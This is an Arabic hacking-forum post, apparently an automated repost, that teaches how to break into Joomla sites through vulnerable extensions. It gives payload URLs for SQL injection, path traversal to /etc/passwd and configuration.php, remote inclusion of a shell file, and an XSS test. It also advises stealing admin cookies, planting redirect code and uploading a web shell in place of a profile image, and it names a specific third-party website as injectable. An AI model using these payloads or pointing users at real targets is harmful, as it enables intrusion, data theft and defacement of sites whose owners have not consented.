1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : .:: RSS ::. | المشاهدات : 1,100 | الردود : 0
حالة الموضوع:
مغلق
  1. .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    80
    الإقامة:
    IQ-T34M

    السلام عليكم و رحمة الله تعالى وبركاته .
    تسجلت في مجتمع الهكر الاخلاقي . حبيت اخلي اول مشاركة مضوع |1|

    اليوم معي شرح خفيف حول اكتشاف الثغرات في جوملا .

    -ما هي الملحقات ؟

    من اجل البدأ يجب عليك تنصيب جوملا في السيرفر الشخصي . بعدها ادخل للوحة و اضف روابط للملحق
    للاضافات التي تريد و لكي تضهر روابط على هذا الشكل
    localhost/joomla/index.php?option=com_v4&Item=1&itemid=11
    روح على
    Administration =>Menus=>Gestion des menus=>nouveau

    index.php?option= هذي دورها االاتصال بالملحق او استدعائه
    com_v4 = اسم الملحق
    itemid=11 و Item=1 = هاذو معرف سوف نتكلم عنهم لاحقا .
    طبعا الان لديك رسم او فكرة عن روايط الجملة بشكل عام . الامر الذي سيساعدك في المراحل القادمة .
    طيب بعد المقدمة نتحدث عن اختراق الجوملا .
    سنتحدث عن 4 انواع من الثغرات و هي
    SQL Injection و Local File Include و Remote File include و Xss و Upload.
    االاشياء التي يجب الانتباه البها اثناء الاختراق هي كالتالي :
    الفورمز او المدخلات و هي مثل مربع البحث او التعليق الخ ...
    - بارامترات الروابط مثل id و controller و cat و page الخ
    نبدا على بركة الله .

    1 - SQL INJECTION

    هذا النوع من الثغرات هو الاكثر انتشارا في الجوملا .
    مثال على رابط مصاب بالسكيول :
    index.php?option=com_v4&cat=11&Item=1
    لبارامترات التي تكون مسؤولة عن الثغرة هي :
    cat , category , kat , id, kats , userid , catid , cats,Item, entry, page,Itemid , categories
    و هناك بارامترات اخرى . . .
    طبعا اكتشاف هل البارامتر مصاب او لا هذا امر معروف فقط تقوم باضافة ' .
    لكي تفهمو اكثر . خلينا نشوف ثغرات .
    index.php?option=com_peliculas&view=peliculas&id=n ull[Sql Injection]
    هنا الملحق المصاب هو piliculas و البارمترالمصاب id .

    مثال هذا الموقع مصاب http://www2.pasadizo.com/index.php?o...iculas&id=1807


    2 - Local File Include

    هذا النوع من الثغرات يسمح لك باستدعاء اي ملف بشرط ان يكون هذا الملف داخل الموقع .
    مثلا يمكنك من استعراض الكونفغ . او ملف /etc/passwd بدون مشاكل .

    ثغرات local file include هي الاخرى منتشرة بنسبة معينة في اضافات الجوملا .

    مثال على رابط مصاب local file include :
    index.php?option= com_v4 =2&view=lfi

    الباراميترات التي تسبب الاصابة بهذا النوع من الثغرات هي :
    - controller
    - view
    - layout
    - page

    امثلة :
    index.php?option= com_v4 =2&controller=lfi
    البارامتر المصاب :controller
    index.php?option= com_v4 =2&view=lfi
    البارامتر المصاب:view

    index.php?option= com_v4 =2&layout=lfi
    البارامتر المصاب: layout

    index.php?option= com_v4 =2&page=lfi
    البارامتر المصاب: page

    لو اريد استعراض ملف passwd مثلا .
    index.php?option=com_v4 &controller=../../../../etc/passwd%00

    في المثال السابق .. استعملنا البارامتر contorller في استدعاء ملف الباسوورد كمثال .
    لاستدعاء الكونفج راح بصير هيك .
    index.php?option=com_v4 &controller=../../../configuration.php
    طبعا كل هذي ملفات تحتوي على معلومات حساسة من شانها ان تتسبب في اختراق السيرفر .
    ملاحضة : هنا انا اشرح بدون تعمق فلو انت لا تعرف شيء
    روح راجع شرحات موجودة بكثرة على هذ النوع .

    3 - Remote File Include

    هذا النوع من الثغرات يسمح لك باستدعاء ملفات خارجية .
    مثال على رابط مصاب local file remote :
    index.php?option=com_v4 &Itemid=&mosConfig_abso lute_path=RFI
    البارامترات المصابة :
    mosConfig.absolute.path
    task
    يعني رابط مصاب راح يكون شكله مثل هذا :
    index.php?option=com_v4 &Itemid=&mosConfig.abso lute.path=rfi
    البارامتر المصاب : mosConfig.absolute.path
    طبعا اذا وجدت ملحق مصاب . حاول انك تستدعي شل . مثلا :
    index.php?option=com_v4team&Itemid=&mosConfig.abso lute.path=http://localhost/shell.txt?

    4 - xss

    النوع من هذا الثغرات له نوعان . واحد مخزن و الاخر لا .
    الفرق بينها هو ان المخزنة تخزن البيانات في قواعد البيانات . مما يجعلها خطيرة .
    اما الثانية فلا تخزن .
    لاكتشاف هذا النوع من الثغرات يجب عليك الانتباه للمدخلات .
    اقصد بالمدخلات مربعات البحث و مكان ادخال الردود الخ . . .
    فيمكنك وضع كود استعلام مثل a l e r t (12345)
    و اذا ضهرت نافذه مكتوب فبها 12345 يعني انه مصاب ..
    فائدة الثغرة هي انها تمكنك من سرقة كوكيز الادمن .
    اما اذا كانت مخزنة فيمكنك زرع كود تحويل الى اندكسك او صفحة ملغمة الخ ...

    5- upload

    هذه الثغرات عموما تمكنك من رفع شل بدون اي مشاكل .
    اكتشافها سهل . كل ما عليك هو ان تجد مركز رفع و تجرب رفع شل .
    عندما اقول مركز رفع فانا اقصد اي مكان يمكنك من خلاله ملفات .
    مثل رفع الصورة الشخصية فبدل الصورة جرب ان ترفع شل .
    ممكن تلاقي مشكل في ايجاد مسار نزول الملف . هناك طريقة جميلة كنت قد راتها في احد المنتديات
    وهي مثلا اذا كنت تشتغل في السيرفر الشخصي . ورفعت ملف 1.php لم تجد مسار نزوله ؟
    بكل بساطة ارجع للوندوس و اعمل بحث في ملف C:\AppServ\www عن 1.php و راح يجيب مساره ض1 .



    المصدر: شبكة عراق تيم IQ-TEAM - من قسم: |[ RSS Forum ]|

    avp h;jaht eyvhj tdJoomla Compon3nts​
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة